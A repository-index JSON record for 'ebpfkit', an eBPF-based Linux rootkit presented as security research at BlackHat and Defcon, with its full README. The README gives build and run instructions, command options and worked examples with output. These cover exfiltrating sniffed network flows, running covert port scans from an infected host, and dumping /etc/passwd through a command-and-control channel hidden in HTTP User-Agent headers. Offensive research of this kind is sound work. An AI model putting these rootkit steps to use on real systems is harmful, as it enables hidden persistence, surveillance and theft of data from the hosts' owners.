{"id":15003668,"url":"https://github.com/gui774ume/ebpfkit","last_synced_at":"2025-04-04T07:07:39.981Z","repository":{"id":37395418,"uuid":"351886433","full_name":"Gui774ume/ebpfkit","owner":"Gui774ume","description":"ebpfkit is a rootkit powered by eBPF","archived":false,"fork":false,"pushed_at":"2023-02-28T16:16:20.000Z","size":8001,"stargazers_count":782,"open_issues_count":4,"forks_count":92,"subscribers_count":18,"default_branch":"master","last_synced_at":"2025-03-27T13:41:24.602Z","etag":null,"topics":["ebpf","kernel","linux","linux-kernel","linux-kernel-hacking","rootkit","runtime-security","security"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Gui774ume.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2021-03-26T19:07:44.000Z","updated_at":"2025-03-24T12:30:50.000Z","dependencies_parsed_at":"2024-01-02T20:52:13.184Z","dependency_job_id":null,"html_url":"https://github.com/Gui774ume/ebpfkit","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Gui774ume%2Febpfkit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Gui774ume%2Febpfkit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Gui774ume%2Febpfkit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Gui774ume%2Febpfkit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Gui774ume","download_url":"https://codeload.github.com
/Gui774ume/ebpfkit/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247135144,"owners_count":20889421,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ebpf","kernel","linux","linux-kernel","linux-kernel-hacking","rootkit","runtime-security","security"],"created_at":"2024-09-24T19:00:01.396Z","updated_at":"2025-04-04T07:07:39.961Z","avatar_url":"https://github.com/Gui774ume.png","language":"C","readme":"# ebpfkit\n\n[![License: GPL v2](https://img.shields.io/badge/License-GPL%20v2-blue.svg)](https://www.gnu.org/licenses/old-licenses/gpl-2.0.en.html)\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n\n`ebpfkit` is a rootkit that leverages multiple eBPF features to implement offensive security techniques. We implemented most of the features you would expect from a rootkit: obfuscation techniques, container breakouts, persistent access, command and control, pivoting, network scanning, Runtime Application Self-Protection (RASP) bypass, etc.\n\nThis rootkit was presented at [BlackHat USA 2021: With Friends Like eBPF, Who Needs Enemies?](https://www.blackhat.com/us-21/briefings/schedule/#with-friends-like-ebpf-who-needs-enemies-23619) and [Defcon 29: eBPF, I thought we were friends !](https://defcon.org/html/defcon-29/dc-29-speakers.html#fournier). While we presented our container breakouts at BlackHat, you'll want to check out our Defcon talk to see a demo of the network scanner and the RASP bypass. 
Slides and recordings of the talks will be available soon.\n\n## **Disclaimer**\nThis project is **not** an official Datadog product (experimental or otherwise), it is just code that happens to be developed by Datadog employees as part of an independent security research project. The rootkit herein is provided for educational purposes only and for those who are willing and curious to learn about ethical hacking, security and penetration testing with eBPF.\n\n**Do not attempt to use these tools to violate the law. The author is not responsible for any illegal action. Misuse of the provided information can result in criminal charges.**\n\n## System requirements\n\n- golang 1.13+\n- This project was developed on an Ubuntu Focal machine (Linux Kernel 5.4)\n- Kernel headers are expected to be installed in `lib/modules/$(uname -r)` (see `Makefile`)\n- clang \u0026 llvm (11.0.1)\n- [Graphviz](https://graphviz.org/) (to generate graphs)\n- [go-bindata](https://github.com/shuLhan/go-bindata) (`go get -u github.com/shuLhan/go-bindata/...`)\n\n## Build\n\n1) To build the entire project, run:\n\n```shell script\n# ~ make\n```\n\n2) To install `ebpfkit-client` (copies `ebpfkit-client` to `/usr/bin/`), run:\n```shell script\n# ~ make install_client\n```\n\n## Getting started\n\n`ebpfkit` contains the entire rootkit. It needs to run as root. Run `sudo ./bin/ebpfkit -h` to get help. 
You can simply run `sudo ./bin/ebpfkit` to start the rootkit with default parameters.\n\n```shell script\n# ~ sudo ./bin/ebpfkit -h\nUsage:\n  ebpfkit [flags]\n\nFlags:\n      --append                        (file override feature only) when set, the content of the source file will be appended to the content of the target file\n      --comm string                   (file override feature only) comm of the process for which the file override should apply\n      --disable-bpf-obfuscation       when set, ebpfkit will not hide itself from the bpf syscall\n      --disable-network-probes        when set, ebpfkit will not try to load its network related probes\n      --docker string                 path to the Docker daemon executable (default \"/usr/bin/dockerd\")\n  -e, --egress string                 egress interface name (default \"enp0s3\")\n  -h, --help                          help for ebpfkit\n  -i, --ingress string                ingress interface name (default \"enp0s3\")\n  -l, --log-level string              log level, options: panic, fatal, error, warn, info, debug or trace (default \"info\")\n      --postgres string               path to the Postgres daemon executable (default \"/usr/lib/postgresql/12/bin/postgres\")\n      --src string                    (file override feature only) source file which content will be used to override the content of the target file\n      --target string                 (file override feature only) target file to override\n  -p, --target-http-server-port int   Target HTTP server port used for Command and Control (default 8000)\n      --webapp-rasp string            path to the webapp on which the RASP is installed\n# ~ sudo ./bin/ebpfkit\n```\n\nIn order to use the client, you'll need to have an HTTP server to enable the Command and Control feature of the rootkit. We provide a simple webapp that you can start by running `./bin/webapp`. 
Run `./bin/webapp -h` to get help.\n\n```shell script\n# ~ ./bin/webapp -h\nUsage of ./bin/webapp:\n  -ip string\n    \tip on which to bind (default \"0.0.0.0\")\n  -port int\n    \tport to use for the HTTP server (default 8000)\n# ~ ./bin/webapp\n```\n\nOnce both `ebpfkit` and the `webapp` are running, you can start using `ebpfkit-client`. Run `ebpfkit-client -h` to get help.\n\n```shell script\n# ~ ebpfkit-client -h\nUsage:\n  ebpfkit-client [command]\n\nAvailable Commands:\n  docker            Docker image override configuration\n  fs_watch          file system watches\n  help              Help about any command\n  network_discovery network discovery configuration\n  pipe_prog         piped programs configuration\n  postgres          postgresql authentication control\n\nFlags:\n  -h, --help               help for ebpfkit-client\n  -l, --log-level string   log level, options: panic, fatal, error, warn, info, debug or trace (default \"info\")\n  -t, --target string      target application URL (default \"http://localhost:8000\")\n\nUse \"ebpfkit-client [command] --help\" for more information about a command.\n```\n\n## Examples\n\nThis section contains only 3 examples. We invite you to watch our BlackHat USA 2021 and Defcon 29 talks to see a demo of all the features of the rootkit. For example, you'll see how you can use Command and Control to change the passwords of a PostgreSQL database at runtime, or how we successfully hid the rootkit on the host.\nWe also demonstrate 2 container breakouts during our [BlackHat talk](https://www.blackhat.com/us-21/briefings/schedule/#with-friends-like-ebpf-who-needs-enemies-23619), and a RASP bypass during our [Defcon talk](https://defcon.org/html/defcon-29/dc-29-speakers.html#fournier).\n\n### Exfiltrate passive network sniffing data\n\nOn startup, by default, the rootkit will start listening passively for all the network connections made to and from the infected host. 
You can periodically poll that data using the `network_discovery` command of `ebpfkit-client`. It may take a while to extract everything so be patient ...\n\n```shell script\n# ~ ebpfkit-client -l debug network_discovery get\nDEBUG[2021-08-04T10:10:46Z]\nGET /get_net_dis HTTP/1.1\nHost: localhost:8000\nUser-Agent: 0000________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________\n\nDEBUG[2021-08-04T10:10:46Z]\nGET /get_fswatch HTTP/1.1\nHost: localhost:8000\nUser-Agent: 0/ebpfkit/network_discovery#________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________\n\nDEBUG[2021-08-04T10:10:46Z]\nGET /get_net_dis HTTP/1.1\nHost: localhost:8000\nUser-Agent: 
0015________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________\n\n[...]\n\nINFO[2021-08-04T10:10:57Z] Dumping collected network flows (358):\n10.0.2.2:52615 -\u003e 10.0.2.15:8000 (1) UDP 0B TCP 2461B\n10.0.2.15:8000 -\u003e 10.0.2.2:52615 (2) UDP 0B TCP 833B\n10.0.2.15:0 -\u003e 10.0.2.3:0 (3) UDP 0B TCP 0B\n10.0.2.3:0 -\u003e 10.0.2.15:0 (4) UDP 0B TCP 0B\n10.0.2.15:22 -\u003e 10.0.2.2:51653 (2) UDP 0B TCP 17120B\n10.0.2.2:51653 -\u003e 10.0.2.15:22 (1) UDP 0B TCP 13068B\n10.0.2.15:48308 -\u003e 3.233.147.212:443 (2) UDP 0B TCP 532255B\n\n[...]\n\n51.15.175.180:123 -\u003e 10.0.2.15:36389 (1) UDP 76B TCP 0B\n10.0.2.15:38116 -\u003e 169.254.172.1:51678 (2) UDP 0B TCP 60B\n10.0.2.15:38120 -\u003e 169.254.172.1:51678 (2) UDP 0B TCP 60B\n127.0.0.1:41900 -\u003e 127.0.0.1:8000 (2) UDP 0B TCP 53525B\n127.0.0.1:41900 -\u003e 127.0.0.1:8000 (1) UDP 0B TCP 53525B\n127.0.0.1:8000 -\u003e 127.0.0.1:41900 (2) UDP 0B TCP 38518B\n127.0.0.1:8000 -\u003e 127.0.0.1:41900 (1) UDP 0B TCP 38518B\nINFO[2021-08-04T10:10:58Z] Graph generated: /tmp/network-discovery-graph-453667534\n```\n\nThe final step is to generate the *svg* file. We used the `fdp` layout of [Graphviz](https://graphviz.org/).\n\n```shell script\n# ~ fdp -Tsvg /tmp/network-discovery-graph-453667534 \u003e ./graphs/passive_network_discovery.svg\n```\n\n![passive_network_discovery.svg](graphs/passive_network_discovery.svg)\n\n### Run a port scan on 10.0.2.3, from port 7990 to 8010\n\n\u003e Note: for this feature to work, you cannot run `ebpfkit-client` locally. 
If you're running the rootkit in a guest VM, expose the webapp port (default 8000) of the guest VM to the host and make the `ebpfkit-client` request from the host.\n\nTo request a port scan, use the `network_discovery` command. You can specify the target IP, start port and port range.\n\n```shell script\n# ~ ebpfkit-client -l debug network_discovery scan --ip 10.0.2.3 --port 7990 --range 20\nDEBUG[2021-08-04T11:59:46Z]\nGET /get_net_sca HTTP/1.1\nHost: localhost:8000\nUser-Agent: 0100000020030799000020______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________\n\nDEBUG[2021-08-04T11:59:51Z] {\"api\":{\"version\":\"1.0.1\",\"hash\":\"9b71d224bd62f3785d96d46ad3ea3d73319bfbc2890caadae2dff72519673ca72323c3d99ba5c11d7cfc1d215a922ad186ac28b0aaa23ed6ebe436e67aacd987cc6e14b8c5da0c4663475c2e5c3adef46f73bcdec043\",\"git_commit\":\"c1d215a922ad186acbe436e6e2c513128b0aaa23ed6e3a4d48140b4931895384bc5b8074b7ef6b1a3e2a65b5be0c875871fec6e1a38f9c3de2c51313a4d48140b4931895384bc5b8074b7ef6b35c208abd4e16f2\",\"release_date\":\"2021-03-29T13:51:31.606184183Z\"},\"timestamp\":\"2021-08-04T09:59:51.680566768Z\",\"status\":200,\"data\":\"OK\"}\n```\n\nOn the infected host, you should see debug logs in `/sys/kernel/debug/tracing/trace_pipe`. For example, you should see the initial ARP request to resolve the MAC address of the target IP, and then a list of SYN requests to probe the ports from the requested range.\n\n```shell script \n# ~ sudo cat /sys/kernel/debug/tracing/trace_pipe\n          \u003cidle\u003e-0       [003] ..s.  
5557.564353: 0: sending ARP request ...\n          \u003cidle\u003e-0       [003] ..s.  5557.564451: 0: ARP response!\n            sshd-3035    [003] ..s1  5559.108243: 0: SYN request answer (7990): rst:1 syn:0\n            sshd-3035    [003] ..s.  5559.108482: 0: SYN request answer (7991): rst:1 syn:0\n          \u003cidle\u003e-0       [003] ..s.  5559.108666: 0: SYN request answer (7992): rst:1 syn:0\n            sshd-3035    [003] ..s.  5559.108882: 0: SYN request answer (7993): rst:1 syn:0\n            sshd-3035    [003] ..s1  5559.109075: 0: SYN request answer (7994): rst:1 syn:0\n            sshd-3035    [003] ..s1  5559.109304: 0: SYN request answer (7995): rst:1 syn:0\n          \u003cidle\u003e-0       [003] .Ns.  5559.109568: 0: SYN request answer (7996): rst:1 syn:0\n          \u003cidle\u003e-0       [003] ..s.  5559.109896: 0: SYN request answer (7997): rst:1 syn:0\n     ksoftirqd/3-30      [003] ..s.  5559.110065: 0: SYN request answer (7998): rst:1 syn:0\n            sshd-3035    [003] ..s.  5559.110344: 0: SYN request answer (7999): rst:1 syn:0\n          \u003cidle\u003e-0       [003] ..s.  5559.110629: 0: OPEN PORT 8000\n          \u003cidle\u003e-0       [003] ..s.  5559.110639: 0: SYN request answer (8000): rst:0 syn:1\n          \u003cidle\u003e-0       [003] .Ns.  5559.110840: 0: SYN request answer (8001): rst:1 syn:0\n            sshd-3035    [003] ..s.  5559.111100: 0: SYN request answer (8002): rst:1 syn:0\n            sshd-3035    [003] ..s1  5559.111455: 0: SYN request answer (8003): rst:1 syn:0\n            sshd-3035    [003] ..s1  5559.111661: 0: SYN request answer (8004): rst:1 syn:0\n          \u003cidle\u003e-0       [003] .ns.  5559.111852: 0: SYN request answer (8005): rst:1 syn:0\n          \u003cidle\u003e-0       [003] ..s.  5559.112016: 0: SYN request answer (8006): rst:1 syn:0\n          \u003cidle\u003e-0       [003] ..s.  5559.112245: 0: SYN request answer (8007): rst:1 syn:0\n          \u003cidle\u003e-0       [003] ..s.  
5559.112597: 0: SYN request answer (8008): rst:1 syn:0\n          \u003cidle\u003e-0       [003] ..s.  5559.112913: 0: SYN request answer (8009): rst:1 syn:0\n            sshd-3035    [003] ..s.  5559.122702: 0: scan done !\n```\n\nOnce the scan is finished, you can exfiltrate the scan result using the `network_discovery` command. You need to add the `active` flag to request the network traffic generated by the network scan. It may take a while to extract everything so be patient ...\n\n```shell script\n# ~ ebpfkit-client -l debug network_discovery get --active\nDEBUG[2021-08-04T09:49:15Z]\nGET /get_net_dis HTTP/1.1\nHost: localhost:8000\nUser-Agent: 0000________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________\n\nDEBUG[2021-08-04T09:49:15Z]\nGET /get_fswatch HTTP/1.1\nHost: localhost:8000\nUser-Agent: 0/ebpfkit/network_discovery#________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________\n\nDEBUG[2021-08-04T09:49:15Z]\nGET /get_net_dis HTTP/1.1\nHost: localhost:8000\nUser-Agent: 
0015________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________\n\n[...]\n\nINFO[2021-08-04T09:49:17Z] Dumping collected network flows (65):\n10.0.2.15:48308 -\u003e 3.233.147.212:443 (2) UDP 0B TCP 65811B\n3.233.147.212:443 -\u003e 10.0.2.15:48308 (1) UDP 0B TCP 17882B\n10.0.2.2:51653 -\u003e 10.0.2.15:22 (1) UDP 0B TCP 30320B\n10.0.2.15:22 -\u003e 10.0.2.2:51653 (2) UDP 0B TCP 39648B\n127.0.0.1:41684 -\u003e 127.0.0.1:8000 (2) UDP 0B TCP 4524B\n127.0.0.1:41684 -\u003e 127.0.0.1:8000 (1) UDP 0B TCP 4524B\n127.0.0.1:8000 -\u003e 127.0.0.1:41684 (2) UDP 0B TCP 3250B\n127.0.0.1:8000 -\u003e 127.0.0.1:41684 (1) UDP 0B TCP 3250B\n127.0.0.1:42682 -\u003e 127.0.0.53:53 (2) UDP 78B TCP 0B\n127.0.0.1:42682 -\u003e 127.0.0.53:53 (1) UDP 78B TCP 0B\n\n[...]\n\n10.0.2.15:57596 -\u003e 10.0.2.3:53 (2) UDP 145B TCP 0B\n10.0.2.3:53 -\u003e 10.0.2.15:57596 (1) UDP 145B TCP 0B\n127.0.0.1:53303 -\u003e 127.0.0.53:53 (2) UDP 78B TCP 0B\n127.0.0.1:53303 -\u003e 127.0.0.53:53 (1) UDP 78B TCP 0B\n10.0.2.15:34355 -\u003e 10.0.2.3:53 (2) UDP 145B TCP 0B\n10.0.2.3:53 -\u003e 10.0.2.15:34355 (1) UDP 145B TCP 0B\n127.0.0.53:53 -\u003e 127.0.0.1:53303 (2) UDP 78B TCP 0B\n127.0.0.53:53 -\u003e 127.0.0.1:53303 (1) UDP 78B TCP 0B\n127.0.0.1:41700 -\u003e 127.0.0.1:8000 (2) UDP 0B TCP 9368B\n127.0.0.1:41700 -\u003e 127.0.0.1:8000 (1) UDP 0B TCP 9368B\n127.0.0.1:8000 -\u003e 127.0.0.1:41700 (2) UDP 0B TCP 6338B\n127.0.0.1:8000 -\u003e 127.0.0.1:41700 (1) UDP 0B TCP 6338B\nINFO[2021-08-04T09:49:17Z] Graph generated: /tmp/network-discovery-graph-3064189396\n```\n\nThe 
final step is to generate the *svg* file. We used the `fdp` layout of [Graphviz](https://graphviz.org/).\n\n```shell script\n# ~ fdp -Tsvg /tmp/network-discovery-graph-3064189396 \u003e ./graphs/active_network_discovery.svg\n```\n\n![active_network_discovery.svg](graphs/active_network_discovery.svg)\n\n### Dump the content of /etc/passwd\n\nThis is a 3 steps process. First you need to ask the rootkit to start looking for `/etc/passwd`. You can use the `fs_watch` command of `ebpfkit-client` to do that.\n\n```shell script\n# ~ ebpfkit-client -l debug fs_watch add /etc/passwd\nDEBUG[2021-08-04T10:14:52Z]\nGET /add_fswatch HTTP/1.1\nHost: localhost:8000\nUser-Agent: 0/etc/passwd#_______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________\n\nDEBUG[2021-08-04T10:14:52Z]\n{\"api\":{\"version\":\"1.0.1\",\"hash\":\"9b71d224bd62f3785d96d46ad3ea3d73319bfbc2890caadae2dff72519673ca72323c3d99ba5c11d7cfc1d215a922ad186ac28b0aaa23ed6ebe436e67aacd987cc6e14b8c5da0c4663475c2e5c3adef46f73bcdec043\",\"git_commit\":\"c1d215a922ad186acbe436e6e2c513128b0aaa23ed6e3a4d48140b4931895384bc5b8074b7ef6b1a3e2a65b5be0c875871fec6e1a38f9c3de2c51313a4d48140b4931895384bc5b8074b7ef6b35c208abd4e16f2\",\"release_date\":\"2021-03-29T13:51:31.606184183Z\"},\"timestamp\":\"2021-08-04T10:14:52.777484554Z\",\"status\":200,\"data\":\"OK\"}\n```\n\nThen, you need to wait until a process on the infected host opens and reads `/etc/passwd` (run `sudo su` to simulate this step). 
The rootkit will copy the content of the file as it is sent back to the process by the kernel.\nFinally, you can exfiltrate the content of the file using the `fs_watch` command again.\n\n```shell script\n# ~ ebpfkit-client -l debug fs_watch get /etc/passwd\nDEBUG[2021-08-04T10:18:35Z]\nGET /get_fswatch HTTP/1.1\nHost: localhost:8000\nUser-Agent: 0/etc/passwd#_______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________\n\nINFO[2021-08-04T10:18:36Z] Dump of /etc/passwd:\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nsystemd-timesync:x:102:104:systemd 
Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\nmessagebus:x:103:106::/nonexistent:/usr/sbin/nologin\nsyslog:x:104:110::/home/syslog:/usr/sbin/nologin\n_apt:x:105:65534::/nonexistent:/usr/sbin/nologin\ntss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false\nuuidd:x:107:112::/run/uuidd:/usr/sbin/nologin\ntcpdump:x:108:113::/nonexistent:/usr/sbin/nologin\nsshd:x:109:65534::/run/sshd:/usr/sbin/nologin\nlandscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin\npollinate:x:111:1::/var/cache/pollinate:/bin/false\nvagrant:x:1000:1000:,,,:/home/vagrant:/usr/bin/zsh\nsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin\nubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash\nlxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false\npostgres:x:112:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash\n____________________________________________________________________________________________________________________________________\n```\n\n## License\n\n- The golang code is under Apache 2.0 License.\n- The eBPF programs are under the GPL v2 License.","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgui774ume%2Febpfkit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgui774ume%2Febpfkit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgui774ume%2Febpfkit/lists"}